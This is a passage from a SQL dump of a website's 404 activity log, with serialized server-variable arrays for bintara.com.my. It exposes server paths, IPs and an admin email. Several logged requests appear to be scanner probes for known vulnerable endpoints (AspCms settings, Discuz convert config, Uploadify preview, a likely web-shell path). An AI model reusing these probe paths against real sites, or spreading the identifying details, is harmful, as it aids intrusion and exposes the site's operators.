42885\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.84.121\";s:11:\"REMOTE_PORT\";s:5:\"51420\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY6jcXKlfXTtZ68oOVBdyQAAAUg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569629041.4175\";s:12:\"REQUEST_TIME\";s:10:\"1569629041\";}}','notice','2019-09-28 00:04:04','2019-09-28 00:04:01',35518288,37324216,'https://bintara.com.my/?page_id=18',1,0,'166.62.84.121'),(27264,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"E1AF77B1-234A-4601-9570-28C5925C77CB\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY6mW3KlfXTtZ68oOVBeDwAAAUM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"60.53.94.110\";s:11:\"REMOTE_PORT\";s:5:\"62088\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY6mW3KlfXTtZ68oOVBeDwAAAUM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569629787.4685\";s:12:\"REQUEST_TIME\";s:10:\"1569629787\";}}','notice','2019-09-28 00:16:29','2019-09-28 00:16:27',35493648,37284464,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'60.53.94.110'),(27265,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:95:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:31:\"/assets/images/content-post.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"144-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"144-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"144-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"144-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:43:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:48:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:48:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:49:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"144-1\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:53:\"https://bintara.com.my/assets/images/content-post.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:31:\"/assets/images/content-post.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY7xSodg5Jl1mQBWl8Vq4QAAAAE\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:53:\"https://bintara.com.my/assets/images/content-post.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:31:\"/assets/images/content-post.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY7xSodg5Jl1mQBWl8Vq4QAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:53:\"https://bintara.com.my/assets/images/content-post.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:31:\"/assets/images/content-post.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY7xSodg5Jl1mQBWl8Vq4QAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:53:\"https://bintara.com.my/assets/images/content-post.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:31:\"/assets/images/content-post.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY7xSodg5Jl1mQBWl8Vq4QAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"63.247.140.181\";s:11:\"REMOTE_PORT\";s:5:\"40554\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"https://bintara.com.my/assets/images/content-post.php\";s:10:\"SCRIPT_URL\";s:31:\"/assets/images/content-post.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY7xSodg5Jl1mQBWl8Vq4QAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569648970.2665\";s:12:\"REQUEST_TIME\";s:10:\"1569648970\";}}','notice','2019-09-28 05:36:12','2019-09-28 05:36:10',35610816,37410752,'https://bintara.com.my/assets/images/content-post.php',1,0,'63.247.140.181'),(27266,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY77hYdg5Jl1mQBWl8VxAAAAAI0\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.85\";s:11:\"REMOTE_PORT\";s:5:\"63959\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY77hYdg5Jl1mQBWl8VxAAAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569651589.8302\";s:12:\"REQUEST_TIME\";s:10:\"1569651589\";}}','notice','2019-09-28 06:19:51','2019-09-28 06:19:50',35485976,37286520,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.85'),(27267,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:14:\"CONTENT_LENGTH\";s:3:\"948\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:73:\"http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:21:\"REDIRECT_QUERY_STRING\";s:25:\"a=config&source=d7.2_x2.0\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY77jYdg5Jl1mQBWl8VxBgAAAJA\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY77jYdg5Jl1mQBWl8VxBgAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/convert/index.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.85\";s:11:\"REMOTE_PORT\";s:5:\"50896\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"http://bintara.com.my/utility/convert/index.php\";s:10:\"SCRIPT_URL\";s:26:\"/utility/convert/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY77jYdg5Jl1mQBWl8VxBgAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569651597.1413\";s:12:\"REQUEST_TIME\";s:10:\"1569651597\";}}','notice','2019-09-28 06:19:58','2019-09-28 06:19:57',35515448,37321256,'http://bintara.com.my/utility/convert/index.php?a=config&source=d7.2_x2.0',1,0,'178.156.202.85'),(27268,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/index.php/api/Uploadify/preview\";s:14:\"CONTENT_LENGTH\";s:2:\"66\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:9:\"PATH_INFO\";s:22:\"/api/Uploadify/preview\";s:15:\"PATH_TRANSLATED\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.85\";s:11:\"REMOTE_PORT\";s:5:\"56439\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:53:\"http://bintara.com.my/index.php/api/Uploadify/preview\";s:10:\"SCRIPT_URL\";s:32:\"/index.php/api/Uploadify/preview\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY77lYdg5Jl1mQBWl8VxDwAAAJM\";s:8:\"PHP_SELF\";s:32:\"/index.php/api/Uploadify/preview\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569651605.2123\";s:12:\"REQUEST_TIME\";s:10:\"1569651605\";}}','notice','2019-09-28 06:20:07','2019-09-28 06:20:05',35489176,37291448,'http://bintara.com.my/index.php/api/Uploadify/preview',1,0,'178.156.202.85'),(27269,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY77p-B8XWjCdXRD8ou-jAAAAA4\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:14:\"178.156.202.85\";s:11:\"REMOTE_PORT\";s:5:\"64611\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY77p-B8XWjCdXRD8ou-jAAAAA4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569651624.084\";s:12:\"REQUEST_TIME\";s:10:\"1569651624\";}}','notice','2019-09-28 06:20:25','2019-09-28 06:20:24',35485976,37286520,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'178.156.202.85'),(27270,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"3050615B-F350-402D-8C9D-7C001F248B3E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY8PxIdg5Jl1mQBWl8V9kQAAAIU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.97.139\";s:11:\"REMOTE_PORT\";s:5:\"46895\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERV